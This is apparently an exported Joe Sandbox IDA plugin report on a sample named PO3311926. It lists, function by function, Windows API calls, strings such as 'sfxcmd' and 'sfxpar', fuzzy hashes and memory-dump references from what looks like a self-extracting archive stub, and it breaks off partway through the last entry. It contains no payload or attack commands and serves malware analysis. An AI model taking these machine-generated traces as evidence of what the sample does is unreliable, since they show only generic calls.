Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 399e81aac893b4ed6c16457f5b09ef14f1a2eeb1eda8dc1bdc52cb15cf5bcbe9
Instruction ID: 9e54c302502c7e158c4eaf42c090d3036c5d0bb78346728b9450ccffd71aa629
Opcode Fuzzy Hash: 399e81aac893b4ed6c16457f5b09ef14f1a2eeb1eda8dc1bdc52cb15cf5bcbe9
Instruction Fuzzy Hash: 9951C17261021AABDB258F64CC85FBBB7EAEB44758F1546ADFC04E6140EB34DC40D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BBCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00BBCE9D

Part of subcall function 00BAB690: _wcslen.LIBCMT ref: 00BAB696

_swprintf.LIBCMT ref: 00BBCED1

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

SetDlgItemTextW.USER32(?,00000066,00BE946A), ref: 00BBCEF1
EndDialog.USER32(?,00000001), ref: 00BBCFFE

Strings

%s%s%u, xrefs: 00BBCEC6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 3d85f6e73e462e1779611ecd15c0ffcc1926362846dae8b0c89dc624da171b3a
Instruction ID: 38275589f743c46b60188ac80ae440e2e6a0fe2264bcd0cc99c298d2d91da5d0
Opcode Fuzzy Hash: 3d85f6e73e462e1779611ecd15c0ffcc1926362846dae8b0c89dc624da171b3a
Instruction Fuzzy Hash: 0C414DB1900259AADF21DB908C95EFE77FCEB05340F4080E6B909E7192EEB49A448F65

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,00BC3C35,00000000,00000FA0,00C02088,00000000,?,00BC3D60,00000004,InitializeCriticalSectionEx,00BD6394,InitializeCriticalSectionEx,00000000), ref: 00BC3C03

Strings

api-ms-, xrefs: 00BC3BC3

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: d15fac7298134452a0764b95372047c8bb66721fbda3dffb485729e9488701a5
Instruction ID: 66b4d55ee89d14ea0587687c66650416f5e6cc3a95b89ddebc575124c63f3849
Opcode Fuzzy Hash: d15fac7298134452a0764b95372047c8bb66721fbda3dffb485729e9488701a5
Instruction Fuzzy Hash: CE11C135A05221ABCB228B689C81F5E77E4DB05F70F6141A9E811EB290E761EE008AD1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00BBABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00BBABF9

Part of subcall function 00BB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BAC116,00000000,.exe,?,?,00000800,?,?,?,00BB8E3C), ref: 00BB1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BBABE9

Strings

@UJu, xrefs: 00BBABF9
EDIT, xrefs: 00BBABCD, 00BBABD8, 00BBABE5

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @UJu$EDIT
API String ID: 4243998846-1013725496
Opcode ID: 5d9f8e12119e2e9faee8b8b239d5278813b8f4aaf46d0ff9ff9f645de601c120
Instruction ID: a41caceb73b90ac65ab598d23995044068421b4812e483b0edf3c91f823f87ae
Opcode Fuzzy Hash: 5d9f8e12119e2e9faee8b8b239d5278813b8f4aaf46d0ff9ff9f645de601c120
Instruction Fuzzy Hash: 74F08232A0122977DB3056249C09FEF76AC9B46B40F494092BA05A21C0D7A1DE45C5B6

Uniqueness

Uniqueness Score: -1.00%

Function 00BA98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00BA7760,?,00000005,?,00000011), ref: 00BA995F
GetLastError.KERNEL32(?,?,00BA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00BA7760,?,00000005,?), ref: 00BA99A2
GetLastError.KERNEL32(?,?,00BA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA99F9

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 65b452aaf520a359954d775686fc56365facebc0d2be5956e8b070c91f275fa6
Instruction ID: 06e9a4076ceaf195382dd5a6b269f74e34d865a5d9764e3d02602c70196ef2e9
Opcode Fuzzy Hash: 65b452aaf520a359954d775686fc56365facebc0d2be5956e8b070c91f275fa6
Instruction Fuzzy Hash: 3431F330548745BFE7209B24CC86BEBBBD8FB46320F100B59F9A1961D1E7A4A944DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
TranslateMessage.USER32(?), ref: 00BBB5AC
DispatchMessageW.USER32(?), ref: 00BBB5B6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: d3c6cf24265bd95f8ff01cf1f0448896370a8a4904b7136806261275c4ec88e8
Instruction ID: 29e68c6cfa7ce0440197ff1e6aea22ea8faed780693820445f3a84ec6b1b8940
Opcode Fuzzy Hash: d3c6cf24265bd95f8ff01cf1f0448896370a8a4904b7136806261275c4ec88e8
Instruction Fuzzy Hash: 1AF0BD71A0215AABCF209BE6AC4CFEF7FBCEE052957014415B509D2050EBB4D605CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBA27 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BC97E5: GetLastError.KERNEL32(?,00BE1098,00BC4674,00BE1098,?,?,00BC40EF,?,?,00BE1098), ref: 00BC97E9
Part of subcall function 00BC97E5: _free.LIBCMT ref: 00BC981C
Part of subcall function 00BC97E5: SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC985D
Part of subcall function 00BC97E5: _abort.LIBCMT ref: 00BC9863

Part of subcall function 00BCBB4E: _abort.LIBCMT ref: 00BCBB80
Part of subcall function 00BCBB4E: _free.LIBCMT ref: 00BCBBB4

Part of subcall function 00BCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BCBA44,?), ref: 00BCB7E6

_free.LIBCMT ref: 00BCBA9F
_free.LIBCMT ref: 00BCBAD5

Strings

0"V, xrefs: 00BCBB1E
0"V, xrefs: 00BCBB19

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: 0"V$0"V
API String ID: 2991157371-3870919522
Opcode ID: e26bafbe53645001891805208a726d3e3e5268a44d6a35b6cc22612f972b35ba
Instruction ID: a3643c14737fdcb41a4435f8b65cc4f73f4fcb46bbc13730bdc8fbe7fe5e260c
Opcode Fuzzy Hash: e26bafbe53645001891805208a726d3e3e5268a44d6a35b6cc22612f972b35ba
Instruction Fuzzy Hash: 50316D31904209AFDB14EBA8D846FADB7E5EF40320F2540DEF9549B2A2EF729D41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
Part of subcall function 00BB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858

OleInitialize.OLE32(00000000), ref: 00BBAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BBAC66
SHGetMalloc.SHELL32(00BE8438), ref: 00BBAC70

Strings

riched20.dll, xrefs: 00BBAC1E

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 0757ee1c1de729f29a24d344001fa7459793979332f8272ab1b395851b9325fd
Instruction ID: fef7077694ef21301e4f62d980ff61020ded35e5248011883a152df3b7a01e1f
Opcode Fuzzy Hash: 0757ee1c1de729f29a24d344001fa7459793979332f8272ab1b395851b9325fd
Instruction Fuzzy Hash: E4F0F9B1900249ABCB10AFAAD849AEFFFFCEF84704F00415AA415A2251DBB45605CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BBDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BBDC30

Strings

sfxpar, xrefs: 00BBDC2B
sfxcmd, xrefs: 00BBDBEF

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 4ccec90ad105cda20e6a52fa2063a95d1aff73d73318f589d87caa2c7c308d48
Instruction ID: efa247f17831a72f4ae519590484f354d1f3af02eaade027216143343029bade
Opcode Fuzzy Hash: 4ccec90ad105cda20e6a52fa2063a95d1aff73d73318f589d87caa2c7c308d48
Instruction Fuzzy Hash: 9EF0EC7240523567CB202F94CC06FFB7FE8EF05B81B0404D2BD85A6161F6F48980D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BA9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00BA97AD
GetLastError.KERNEL32 ref: 00BA97DF
GetLastError.KERNEL32 ref: 00BA97FE

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 2ad0c85af20936b248c6d9a0ce689665ecda0b66fd100cd3f77b4d322938114b
Instruction ID: 466bef8dc5aee4e0e10a1b83d40a00a094b9dabf2a145109b72cac351ecdd77c
Opcode Fuzzy Hash: 2ad0c85af20936b248c6d9a0ce689665ecda0b66fd100cd3f77b4d322938114b
Instruction Fuzzy Hash: 5811A530918204EBDF205F64C84466D77E9FB43BA0F2085AAF416C6190E778DE44FB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00BC40EF,00000000,00000000,?,00BCACDB,00BC40EF,00000000,00000000,00000000,?,00BCAED8,00000006,FlsSetValue), ref: 00BCAD66
GetLastError.KERNEL32(?,00BCACDB,00BC40EF,00000000,00000000,00000000,?,00BCAED8,00000006,FlsSetValue,00BD7970,FlsSetValue,00000000,00000364,?,00BC98B7), ref: 00BCAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BCACDB,00BC40EF,00000000,00000000,00000000,?,00BCAED8,00000006,FlsSetValue,00BD7970,FlsSetValue,00000000), ref: 00BCAD80

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ab8716e799e4bde0a499cd85fef80186b1ddf08baf34835961f808a59aa9f316
Instruction ID: a42bbfbbc544b30fa001854c401578d02675866499aed6b347a3e3d8643144c2
Opcode Fuzzy Hash: ab8716e799e4bde0a499cd85fef80186b1ddf08baf34835961f808a59aa9f316
Instruction Fuzzy Hash: CE01283270222AABC7214E689C94F56BBD8EF00B667110279F807D3560EF20CC0186E2

Uniqueness

Uniqueness Score: -1.00%

Function 00BB101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00BB1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00BB108A

Part of subcall function 00BA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA6C54

Strings

CreateThread failed, xrefs: 00BB104F

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 210f3ea6ef5cc1c87b034ad8e1a1aee3799d6205ed94c836ed3a634ebc5874fc
Instruction ID: 570f06c20b84f76ac6b3f61b18ea67389ca78967315c4c5d130ee4caec5ab632
Opcode Fuzzy Hash: 210f3ea6ef5cc1c87b034ad8e1a1aee3799d6205ed94c836ed3a634ebc5874fc
Instruction Fuzzy Hash: 3F01DBB53443496BD330AF6C9C61BB6B3E8EB40751F6008AEF58656181DEF1A8844624

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAE2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00BAC29A: _wcslen.LIBCMT ref: 00BAC2A2

Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB1FE5
Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB1FF6
Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB2006
Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB2014
Part of subcall function 00BB1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BAB371,?,?,00000000,?,?,?), ref: 00BB202F

Part of subcall function 00BBAC04: SetCurrentDirectoryW.KERNELBASE(?,00BBAE72,C:\Users\user\Desktop,00000000,00BE946A,00000006), ref: 00BBAC08

_wcslen.LIBCMT ref: 00BBAE8B
SHFileOperationW.SHELL32(?,?,?,?,?,00BE946A,00000006), ref: 00BBAEC4

Strings

C:\Users\user\Desktop, xrefs: 00BBAE68

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryFileOperationString
String ID: C:\Users\user\Desktop
API String ID: 1016385243-1876063424
Opcode ID: 781bb1eee5f46a5fd2694cadb24da0b5b9b6ebb3de12abdf1090a0e62a1a80b0
Instruction ID: 7f221e89fb46b192d00cc07aec8d6679b1f38c9e87c10785910066bea61937d7
Opcode Fuzzy Hash: 781bb1eee5f46a5fd2694cadb24da0b5b9b6ebb3de12abdf1090a0e62a1a80b0
Instruction Fuzzy Hash: A6011E71D0025966DF21ABA4DD0AEFE77FCEF09704F0004A5F506E3192EAF4D6448AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00BAD343,00000001,?,?,?,00000000,00BB551D,?,?,?), ref: 00BA9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00BB551D,?,?,?,?,?,00BB4FC7,?), ref: 00BA9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00BAD343,00000001,?,?), ref: 00BAA011

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 7fb8caefc109b4e1c2c4440113bceae3d0207c1701c891869f4a0af7d0f4c022
Instruction ID: 1fa6601705f6d629f352e31c42f55cf21ecfbd5b77a77636ecf6c9d617c28699
Opcode Fuzzy Hash: 7fb8caefc109b4e1c2c4440113bceae3d0207c1701c891869f4a0af7d0f4c022
Instruction Fuzzy Hash: 6531D131208345AFDB24CF24D858B6EB7E5FF86B11F04495DF98197290CB76AD48CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00BAC27E: _wcslen.LIBCMT ref: 00BAC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA30C
GetLastError.KERNEL32(?,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA329

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 1764bd771b448db6109813bc232122fe817a88f44f82063f027c20f24c2bb21b
